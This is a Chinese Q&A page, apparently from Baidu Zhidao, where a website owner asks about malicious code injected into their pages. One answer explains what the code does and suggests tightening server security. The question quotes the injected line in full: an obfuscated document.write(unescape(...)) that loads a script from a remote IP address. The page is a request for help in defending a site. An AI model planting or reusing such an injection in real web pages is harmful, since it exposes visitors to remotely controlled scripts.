![](https://iknow-base.cdn.bcebos.com/lxb/notice.png)
网页被注入恶意代码,在网页源码最后多出以下三行代码: <script type="text/javascript">document.write
求大神知道如何解决,杀软查不出问题。多出的代码如下:<scripttype="text/javascript">document.write(unescape('%3Cs...
求大神知道如何解决,杀软查不出问题。
多出的代码如下:
<script type="text/javascript">document.write(unescape('%3Cscript type="text/javascript" src="http://115.238.147.102/A0EED19F1C1CB08BDED1D52D5DA33474?id=3&t=23339767&m=de74595181cfe9c5"%3E%3C/script%3E'))</script> 展开
多出的代码如下:
<script type="text/javascript">document.write(unescape('%3Cscript type="text/javascript" src="http://115.238.147.102/A0EED19F1C1CB08BDED1D52D5DA33474?id=3&t=23339767&m=de74595181cfe9c5"%3E%3C/script%3E'))</script> 展开
1个回答
展开全部
就是被添加了脚本
脚本意图是输出一个文档流
这个文档流也是一个脚本
恶意脚本指向打开某个115.238.147.102的网页,采用自动登录id的方式
那我估计,这个恶意代码,是借用你的网页被各个网友打开
等于每个网友帮他登录那个网站 估计是刷分用的
但不确定会不会自动下载什么
杀软当然无法分析者是不是病毒还是你的本意
解决方法不在页面代码
而是在于服务器安全策略
比如说 asp调用执行iis账户权限
采用sql数据库登录的账户 可能是sa 账户的保密问题
也可能是系统账户问题
还有就是系统漏洞
很多方面啦,这个你另外百度 "网站服务器安全"
脚本意图是输出一个文档流
这个文档流也是一个脚本
恶意脚本指向打开某个115.238.147.102的网页,采用自动登录id的方式
那我估计,这个恶意代码,是借用你的网页被各个网友打开
等于每个网友帮他登录那个网站 估计是刷分用的
但不确定会不会自动下载什么
杀软当然无法分析者是不是病毒还是你的本意
解决方法不在页面代码
而是在于服务器安全策略
比如说 asp调用执行iis账户权限
采用sql数据库登录的账户 可能是sa 账户的保密问题
也可能是系统账户问题
还有就是系统漏洞
很多方面啦,这个你另外百度 "网站服务器安全"
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询